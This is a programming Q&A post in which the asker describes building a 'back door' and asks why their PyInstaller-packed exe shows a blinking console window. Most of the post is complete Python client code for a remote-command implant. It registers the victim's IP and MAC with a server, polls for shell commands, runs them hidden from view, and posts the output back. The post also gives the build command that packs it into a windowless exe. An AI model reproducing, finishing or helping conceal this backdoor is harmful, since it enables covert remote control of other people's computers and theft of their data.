# python program packed by Pyinstaller shows blinking window on windows

Tags: windows, pyinstaller, exe

I am trying to write a back door program with python.
I design the program with client-server architecture.

Here is the code of client.

```
from subprocess import PIPE, Popen, CREATE_NO_WINDOW
from typing import List, Optional
from datetime import datetime
from time import sleep
from threading import Thread
from socket import socket, AF_INET, SOCK_DGRAM
from getmac import get_mac_address as gma
import json
import requests
import urllib3


urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

SERVER_PORT = 8080
SERVER_ADDRESS = 'https://example.com:' + str(SERVER_PORT)


def get_ip() -> str:

    s = socket(AF_INET, SOCK_DGRAM)
    s.connect(("8.8.8.8", 80))
    ip = s.getsockname()[0]
    s.close()

    return ip


def get_mac() -> str:

    return gma().replace(':', '')


def announce() -> List[str]:

    requests.post(f'{SERVER_ADDRESS}/announce/{get_id()}', verify=False)


def get_id() -> str:

    return get_ip() + '_' + get_mac()


def get_command() -> Optional[List[str]]:

    try:
        r = requests.get(f'{SERVER_ADDRESS}/command/{get_id()}', verify=False)

    except requests.exceptions.ConnectionError:
        print('Connection to server error.')
        return None

    if r.status_code == 200:
        r = json.loads(r.text)

        status = int(r['status'])

        if status == 1:
            print(f'Get a command from server.')
            return r['command']
        else:
            return None

    else:
        print(f'Server returned status code {r.status_code}.')
        print(f'Here is the response from server:\n{r.text}')
        print()


def run_command():

    while True:
        command = get_command()

        if command is not None:
            p = Popen(command, shell=True, stdout=PIPE, stderr=PIPE, creationflags=CREATE_NO_WINDOW)
            stdout, stderr = p.communicate()

            data = {
                'command': command,
                'result': stdout.decode() + stderr.decode(),
                'timestamp': datetime.now().strftime('%Y.%m.%d %H:%M:%S'),
            }

            requests.post(f'{SERVER_ADDRESS}/result/{get_id()}', json=data, verify=False)

        sleep(5)


announce()
Thread(target=run_command).start()
```

The program runs well and I pack the python file to exe file with PyInstaller with the following command on windows.

```
pyinstaller -F -w program.py

-F  for one-file
-w  for window hidding
```

The packed program(exe file) runs well, but a windows terminal window shows with about 1Hz frequency.  The behavior is strange and I need help.

The blinking window is NOT caused by subprocess because the window keep blinking even if I don't give any command to client.

I have googled the problem for a short time, but there is nothing helpful.  I don't know the reason why the window keep blinking, and I think that is the point to explain why I just find nothing.

Comment: what command is the subprocess running?

Comment: @Alexander My program(in exe format) blink even if I didn't use subprocess(get_command function returned None in run_command function).

Comment: I have tried to execute several command such as  "dir C:" and "cd C:\Users; mkdir 123" by subprocess. The commands execute successfully. However, my program(in exe format) blinks whether I call subprocess or not.